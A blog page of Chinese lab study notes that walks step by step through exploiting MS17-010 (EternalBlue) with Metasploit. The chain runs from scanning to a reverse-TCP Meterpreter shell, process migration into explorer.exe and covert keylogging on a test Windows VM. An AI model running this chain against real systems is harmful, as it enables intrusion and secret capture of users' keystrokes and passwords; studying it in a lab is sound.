linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录

最新推荐文章于 2023-04-04 21:30:39 发布
最新推荐文章于 2023-04-04 21:30:39 发布
阅读量443 收藏 2
点赞数 1
文章标签: linux 键盘记录

环境:        攻击机:192.168.200.101   //kali Linux 2020

靶机:192.168.200.103    (未打MS17-010补丁windowsServices2008.x64)

1:msfconsole                                                                         //进入metaploit

2:nmap -sV 192.168.200.103(检查445端口是否开放)        //使用nmap探测主机信息

3:利用msf的auxiliary模块进行漏洞验证

search ms17-010                                                                         //查询MS17-010永恒之蓝漏洞信息

use  auxiliary/scanner/smb/smb_ms17_010                                 //使用辅助扫描smb,是否存在永恒之蓝漏洞

set  rhost  192.168.200.103                                                         //设置目标IP

set  rport   445                                                                         //设置目标端口

run                                                                                                 //开始扫描

4:设置攻击目标、端口、本机

use  exploit/windows/smb/ms17_010_eternalblue                      //利用永恒之蓝漏洞

set  rhost  192.168.200.103                                                      //设置目标IP

set  rport   445                                                                     //设置目标端口

set lhost 192.168.200.101                                                     //设置kali linux IP地址

set  payload   windows/x64/meterpreter/reverse_tcp             //使用reverse_tcp攻击荷载

show options                                                                             //查看是否设置完成

run                                                                                             //开始攻击

若成功则拿到目标机的shell

6:输入ps查看进程

#找到explorer.exe进程(记住PID)

PID   PPID  Name               Arch  Session  User                          Path

---   ----  ----               ----  -------  ----                          ----

1996  1980  explorer.exe       x86   0        VIOLET\violetevergarden       C:\WINDOWS\Explorer.EXE

7:meterpreter > migrate 1996                                         //迁移会话

8:run post/windows/capture/keylog_recorder                //进行键盘记录

#键盘记录完成后会生成一个文件,文件路径会在攻击完成后显示,注意,键盘记录需要按ctel+c结束。

————有些小伙伴可能在拿到shell后可能会有乱码这里给予解决方法:输入命令:chcp 65001 即可

Fok Wayne
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali键盘记录
jhbgvk23的博客
04-20 3443
键盘记录
网络安全 基础之 Windows漏洞复现 (MS17-010)永恒之蓝
weixin_60888404的博客
06-01 2160
Windows经典漏洞 永恒之蓝复现
网络安全与网站安全及计算机安全:如何防御计算机操作系统永恒之蓝勒索病毒?
Kali与编程
12-30 2081
防御ms17_101的方法: 1.安装杀毒软件 2.关闭445端口 3.打开计算机的防火墙功能 防御方式: 一、关闭文件共享 1.1首先我们接着永恒之蓝篇,测试是否能够连接目标电脑。 可以看到我们已经成功连接。 2.1接着我们打开控制面板->网络和 Internet->网络和共享中心->高级共享设置。关闭网络发现和文件共享,点击保存修改。 2.2我们再次打开kali再次使用永恒之蓝进行尝试。 2.3当我们关闭了共享服务时,就无法再次利用永恒之蓝对我们的计算机进行测试了。 二、打开防火
CentOS7.8-MySQL-MHA高可用部署搭建
weixin_73705067的博客
04-04 760
目录Msyql MHA高可用MHA简介:MHA 优点:MHA 故障切换流程Manager工具:MHA搭建操作步骤:一、基础环境搭建1.1、将主机全部修改主机名&生成密钥1.2、man-manager修改host同步1.3、yum安装mysql 5.7版本1.44、优化MySQL(101、102、103都做)1.5、将下文导入my.cnf(101、102、103都做)1.6、mha-slave1二、开始配置主从复制2.1、mha-master2.2、mha-slave12.3、mha-slave22.4、mh
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux-2023.3-vmware-amd64.part1.rar
最新发布
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
ms17-101补丁,永恒之蓝补丁
11-25
有效防止基于msb攻击的病毒,永恒之蓝,蠕虫病毒。。。。
MS17-010 补丁
05-15
此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 有关此更新的更多信息,请参阅 Microsoft 知识库文章 4013389。
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
国基北盛—云计算容器云pass(2.4)平台搭建
cbc_19的博客
08-27 5231
容器云平台搭建步骤详情: 1.虚拟机配置信息: Master: 内存6G + 处理器 2*2 + 硬盘160G + 网卡1(192.168.200.103) Node: 内存6G + 处理器 2*2 + 硬盘160G + 网卡1(192.168.200.104) 2.基础环境: 2.1 关闭防火墙+关闭selinux+设置主机名+编写hosts文件 Master: [root@localhost ~]# hostnamectl set-hostname master [ro
MSF之ms17-010永恒之蓝漏洞利用
热门推荐
极光时流
11-26 1万+
MSF之ms17-010永恒之蓝漏洞利用准备扫描漏洞漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali系统,其IP为:192.168.207.130 攻击工具:kali自带的msfconsole工具 扫描漏洞kali终端中输入msfconsole use auxiliary/scanner/smb/s...
Docker报错总结
weixin_30920853的博客
05-08 125
【Docker push镜像报错】 The push refers to a repository [192.168.200.103:5000/rancher/server]Get https://192.168.200.103:5000/v1/_ping: http: server gave HTTP response to HTTPS client 【解决方案】 1...
nginx虚拟主机配置
baiqian1909的博客
08-25 124
一、虚拟主机概念和类型介绍 1、虚拟主机概念虚拟主机在web服务器里就是一个独立的网站站点,这个站点对应独立的域名(也可能是IP或端口),具有独立的程序及资源目录,可以独立的对外提供服务供用户访问。一个web服务里可以同时支持多个虚拟主机站点 2、虚拟主机类型常见的虚拟主机类型有如下几种。 (1)基于域名的虚拟主机 所谓基于域名的虚拟主机,意思就是通过不同的域名区分不同的虚拟主机...
ubuntu使用cephadm安装ceph集群
u013917468的博客
08-18 1468
在 ubuntu 系统中使用cephadm 安装ceph 集群。以及常见问题处理。
Kali Linux系统管理与命令指南
"这份PDF文件提供了Kali Linux操作系统中常用的一些命令,涵盖了系统信息查询、硬件检测、磁盘与文件系统管理、关机与重启操作、以及文件和目录操作等多个方面。" Kali Linux是一款基于Debian的Linux发行版,主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值